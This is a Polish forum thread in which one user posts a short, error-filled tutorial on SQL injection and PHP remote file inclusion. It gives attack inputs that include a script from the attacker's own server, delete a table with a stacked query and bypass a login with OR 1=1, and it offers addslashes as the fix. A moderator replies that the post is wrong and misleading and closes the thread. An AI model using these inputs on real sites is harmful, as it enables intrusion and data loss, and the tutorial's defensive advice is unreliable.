Pokaż wyniki 1 do 3 z 3

Temat: Tutorial SQL - >

  1. #1
    Avatar se4o
    se4o jest offline YinSecure
    Zarejestrowany
    Jun 2011
    Postów
    20

    Domyślnie Tutorial SQL - >

    SQL Injection (ang. „wstrzyknięcie” SQL)– atak polegający na wykorzystaniu luki w języku SQL. Dzięki niewłaściwemu filtrowaniu lub przez brak doświadczenia administratora, atakujący może uzyskać dosłownie wszystko. Od treści pisanych na stronie, przez dane personalne użytkowników, po hasła i loginy administratorów i użytkowników.

    Blind SQL Injection – tzw. „ślepy” atak. Jest to zaawansowana forma SQL Injection. Nazwa wzięła się od techniki ataku, bowiem, żeby uzyskać jakieś dane, musimy zgadywać. Ten rodzaj ataku nie zwraca błędów, dzięki czemu wiemy że atak jest skuteczny.

    Wielu z was pewnie ciekawi jak można otworzyć zdalnie plik na jakimś serwerze zdradze wam pewien sposób jedynie co będzie potrzebne to żeby ten plik (php przeważnie ) był umieszczony na twojej stronie lub pod jakimś adresem w sieci

    Kod wrażliwy na atak to :

    Kod:
    index.php?plik=jakasstrona.php
    a w kodzie

    Kod:
    include($plik);
    Wtedy możemy to wykorzystać do ataku :

    Kod:
    index.php?plik=http://mójserwer/skrypt.php
    Po takim wywołaniu w pasku php pobierze z mojego serwera skrypt i go przetworzy na serwerze ofiary .
    Może odczytać hasła z bazy danych a także wykonywać operacje na plikach wszystko zależy o twórczego wykorzystania ; )


    A tu zabezpieczenie >

    Kod:
    switch($plik){
    case 'jakasstrona.php': include('news.php');
    }


    --------------------------------------------------------------------

    Przypuśćmy ,że mamy
    Kod:
    index.php?module=page&pg_id=33
    Takie wywołanie powinno wyświetlić stronę o id 33
    w kodzie zapis jest podobny .

    Kod:
    SELECT * FROM pages WHERE id=$pg_id
    łatwo można to oszukać ; )
    np
    Kod:
    index.php?module=page$pg_id=33; DELETE FROM pages;
    Wywołuje to 2 zapytania do bazy ale te 2 jest nie pożądane . Powoduje to usunięcie strony ...
    Polecam stosowanie
    Kod:
    addslashe()
    A tu inny ciekawy błąd który nadal można spotkać ; p

    Kod:
    SELECET * FROM hasla WHERE login='login' OR 1=1 OR 1='1' AND haslo='haslo'
    Na razię tyle Jedynie czego mogę ci polecić to naukę php / mysql

  2. #2
    Zarejestrowany
    Sep 2006
    Postów
    1,227

    Domyślnie

    Cytat Napisał se4o Zobacz post
    przez brak doświadczenia administratora,
    (...)
    żeby uzyskać jakieś dane, musimy zgadywać.
    (...)
    Kod wrażliwy na atak to :
    Kod:
    index.php?plik=jakasstrona.php
    (...)
    nie pożądane
    (...)
    Kod:
    addslashe()
    (...)
    SELECET
    (...)
    Na razię
    • Niewłaściwy tytuł,
    • błędy merytoryczne,
    • błędy logiczne,
    • błędy ortograficzne,
    • literówki w kodzie.
    • brak formatowania tekstu,
    • zwracanie się w pierwszej osobie do czytelnika
    • kłamstwa
    • przeszło połowa postu niezwiązana z tematem


    Nie poprawiłeś błędów w Twoich poprzednich "tutorialach" i zabierasz się za pisanie następnych? Nie pisz już tego typu materiałów ponieważ wprowadzasz w błąd czytelników. Nic nowego nie wnosisz do tematu.

    Wspomniana przez Ciebie metoda obrony przed sql injection jest jest najgorszą, jaką przeczytałem. Nie wspominasz o prepared statement, nie piszesz o MVC. Straciłeś swój i nasz czas.

    Zajmij się czymś innym.


    Dla ludzi, którzy czytają ten wątek, bo chcą się czegoś nauczyć:


    Zamykam.

  3. #3
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52